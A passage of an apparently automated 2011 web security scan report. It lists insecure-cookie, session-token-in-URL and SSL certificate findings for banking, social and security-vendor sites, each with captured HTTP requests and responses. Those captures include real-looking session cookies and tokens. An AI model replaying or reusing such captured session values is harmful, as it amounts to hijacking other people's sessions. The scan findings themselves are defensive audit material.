Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 79822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

9.43. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

10. Session token in URL  previous  next
There are 4 instances of this issue:


10.1. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=f628c2a0-5de5-4ec1-857e-849881b01ba7&hostname=www.tenable.com&location=%2Fservices%2Fnessus-perimeter-service&url=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&sessionID=1303775069685.44375&fpc=ece3cfc-12f8f0cc5fa-d0c182-1&ts1303775074502.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 25 Apr 2011 23:45:19 GMT
Connection: keep-alive


10.2. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:47 GMT
Content-type: text/html;charset=UTF-8
Set-Cookie: SMIDENTITY=gR5vcd2T/9Pc8ggsnVIGFH2qS8UPe2InnEOKagmWCynRXczda87F4qQCcxXuFUHUslSW1KHy/MNQvuu5a0LFHQ+Yb+bXZGJG4jTdlo9tzaaaKPx3Pagvvtj1nZrTvP4C46pkodCH4CDcB/3rGd3UgOWOSL4lcJfCqsncm1lYr6e/ggBvgbwAsg3ni4IblWDlcCFGxK6jvqACOjfn31o65GuqLQK0WtCQcW/tfxLNdLJ638dCE54AhZ4CJ6m42FeUmuFs2SXlyGiAzf+yLMGl+4hznDezzrBb/w3+N6PBIomj/sT2UCohDEmUTPyi/ZkV4wm9V+sBOUDySiXavKZak292O/W0gh9tk4PU4ZYiGNpxKH6gw9tMSXhsc9r7Zp5pMJQd8kUkt6VJnO6g2Ef2bEAraf+WGZI5kQorViWkIFPPu+x0DweCzY+yWJ5folKswk4G/dYJP9N2U6ybWc8jHuQ6r20V37uYeqO878kY4Zp47DVGcyRzQZ4guLBaha65; path=/; domain=.bankofamerica.com; secure
Content-language: en-US
Set-cookie: JSESSIONID=0000zX4AQQUcvRQK0iSsbAUjzzb:12qb4k7c1; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="EN">
   <head>
       <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css"
   rel="styles
...[SNIP]...
<noscript>
   <iframe src="https://sitekey.bankofamerica.com/sas/sitekeyWidgetScript.do?nojs=true&gcsl_token=9DC0A8B40B2030BE48CC994ACF8E7234475C763CB0C2A4F191F4C97FD66B68EE19AEC9325C6F8FCC5939B4CDAB696AFB69A14A76564F1A40255AB19F86B2DE1201B1EE60F06948E2097D4B6A0981A4ADF9FC42DDD580648D62B7C090A04CF9AC0840BC56A49B34829D6F702D60621995D0986513A1725428C06D24B2D27D0695CD384A0B7E1BC13150951892426D5A0586E1F4FFB5D5CD067B06BAFF1230F72A8839AA873AEDAE0EAC428D8A652AAF6F5DDE41B604D665FF8BA4CCF25EF117A12235C926176BE99148B33E2A8967433555276CB2456D773FF605C314B530ACA1829A8FA4DA1D12F9DCC54A6E61D2B1D0B9949C14905B857A2BC59ED235AF21FA6AB0B8F226802E0BECDE085B6F05BA84BFA6EDE859A8FF833AA0422D126B2C9015969A26A701DE7363B9CA301CA3B48FDCA7B32787A51FBEFE354F4492F40598A98F4B7B8B1821088C9D576BF192A923EE879C57D7624E3B2C713D8AE6869C50096097ACD91199CAACF120ED7FBFB6040750D492BFEB619E3BDCCAE85E4B4C378A4574BD09E74818ECB1BFE9117C27E6DF438037B8DB6A7236AD0102B7A3FDC55302C51F85BECBE9370B4B93A31E89565951516A0457D9F3AF838229B07E8B47B04B033FE3671C165B551E449386BDB3BD80410AA2FBF756CDE54F591B0E38A14A7FDB997844C55FB81F095B9C457CFFDBB9D76892A76E5D80AD44C46F8E75EBA8FFAA61D315CFB1A5469DF7B24754F6C749AC191191D722AC126BE923A0DC4E034245C7686C9D91D866C761B5C8018BA27314FCCBAA9B9C797395832E456EE7A9C4979A32D7AB09CCFE957873DC4F78BBFA8CB6A93D11052FCA533386E413401396685EA463B733F825237F7DFF329F01041F9EFEEA1B5385745849B2D5E4D889E341FC689206926EF86E9D16C93ECEC1BBB0BBFB57D625&source=BOFA-CAP&gcsl_iv=F96D3BF5877F7949" height="200" width="250" frameborder=0 scrolling=no>
   </iframe>
...[SNIP]...

10.3. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.249.46
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:02 GMT
Content-Length: 0


10.4. http://www.hugthecloud.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:27 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT
Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT
X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe
X-XN-XNHTML: false
Date: Tue, 26 Apr 2011 12:39:16 GMT
Date: Tue, 26 Apr 2011 12:39:16 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/html; charset=utf-8
Server: Ning HTTP Server 2.0
Content-Length: 54058

<!DOCTYPE html>
<html lang="en">
<head data-layout-view="default">
<script>(function(){var d={date:8,app:"s",host:"s",ip:4,ua:"s",user:"s",url:"s",html:4,css:4,render:4,js:4,nlr:4,nlr_eval
...[SNIP]...
<li data-provider-name="Google"><a onclick="window.open('https://hugthecloud.networkauth.com/openid/start?openid_identifier=http%3A%2F%2Fwww.google.com%2Faccounts%2Fo8%2Fid&token_url=http%3A%2F%2Fwww.hugthecloud.com%2Fmain%2Fauthorization%2FprocessExternalAuth%3Ftarget%3Dhttp%253A%252F%252Fwww.hugthecloud.com%252F%26source%3DsignUp%26close%3D1', null, 'width=530,height=480,location=no,menubar=no,resizable=yes,scrollbars=yes,toolbar=no,status=no'); return false;" href="https://hugthecloud.networkauth.com/openid/start?openid_identifier=http%3A%2F%2Fwww.google.com%2Faccounts%2Fo8%2Fid&amp;token_url=http%3A%2F%2Fwww.hugthecloud.com%2Fmain%2Fauthorization%2FprocessExternalAuth%3Ftarget%3Dhttp%253A%252F%252Fwww.hugthecloud.com%252F%26source%3DsignUp%26close%3D0">
<span class="mini-service mini-service-google" title="Google">
...[SNIP]...

11. SSL certificate  previous  next
There are 25 instances of this issue:


11.1. https://landingpage.leads.dynamicssite.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://landingpage.leads.dynamicssite.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.Leads.DynamicsSite.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Tue Feb 08 19:01:06 CST 2011
Valid to:  Thu Feb 07 19:01:06 CST 2013

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

11.2. https://m8security.foxycart.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://m8security.foxycart.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.foxycart.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Mar 14 19:00:00 CDT 2011
Valid to:  Wed Jul 11 07:00:00 CDT 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

Certificate chain #4

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.3. https://secure.opinionlab.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.opinionlab.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Jun 15 19:00:00 CDT 2009
Valid to:  Mon Jul 11 18:59:59 CDT 2011

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.4. https://securitymetrics.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.securitymetrics.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Thu Sep 23 19:00:00 CDT 2010
Valid to:  Tue Oct 01 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.5. https://store.tenable.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.tenable.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Thu May 20 19:00:00 CDT 2010
Valid to:  Tue May 28 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.6. https://support.tenable.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.tenable.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Thu May 20 19:00:00 CDT 2010
Valid to:  Tue May 28 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.7. https://www.clone-systems.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.clone-systems.com
Issued by:  Network Solutions EV SSL CA
Valid from:  Tue Aug 24 19:00:00 CDT 2010
Valid to:  Sat Aug 25 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Network Solutions EV SSL CA
Issued by:  Network Solutions Certificate Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019

11.8. https://www.comodo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.comodo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.comodo.com
Issued by:  COMODO EV SGC CA
Valid from:  Wed Jul 08 19:00:00 CDT 2009
Valid to:  Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  COMODO EV SGC CA
Issued by:  AddTrust External CA Root
Valid from:  Sun Dec 31 18:00:00 CST 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  COMODO EV SGC CA
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Mon Jun 24 14:06:30 CDT 2019

Certificate chain #3

Issued to:  COMODO EV SGC CA
Issued by:  COMODO Certification Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019

Certificate chain #4

Issued to:  COMODO Certification Authority
Issued by:  COMODO Certification Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Mon Dec 31 17:59:59 CST 2029

11.9. https://www.hackerguardian.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.hackerguardian.com
Issued by:  COMODO High Assurance Secure Server CA
Valid from:  Thu Feb 18 18:00:00 CST 2010
Valid to:  Sat Mar 23 18:59:59 CDT 2013

Certificate chain #1

Issued to:  COMODO Certification Authority
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  COMODO High Assurance Secure Server CA
Issued by:  COMODO Certification Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019

Certificate chain #3

Issued to:  UTN - DATACorp SGC
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #4

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #5

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.10. https://account.snap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  account.snap.com
Issued by:  UTN-USERFirst-Hardware
Valid from:  Tue Oct 19 19:00:00 CDT 2010
Valid to:  Mon Oct 31 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

11.11. https://lct.salesforce.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lct.salesforce.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  lct.salesforce.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Sun Jan 23 18:00:00 CST 2011
Valid to:  Fri Jan 25 17:59:59 CST 2013

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.12. https://militarybankonline.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://militarybankonline.bankofamerica.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  militarybankonline.bankofamerica.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Oct 06 19:00:00 CDT 2010
Valid to:  Fri Oct 07 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.13. https://olui2.fs.ml.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  olui2.fs.ml.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Jan 31 18:00:00 CST 2011
Valid to:  Wed Feb 01 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.14. https://secure.comodo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.comodo.com
Issued by:  COMODO Extended Validation Secure Server CA
Valid from:  Wed Mar 30 19:00:00 CDT 2011
Valid to:  Thu Jun 27 18:59:59 CDT 2013

Certificate chain #1

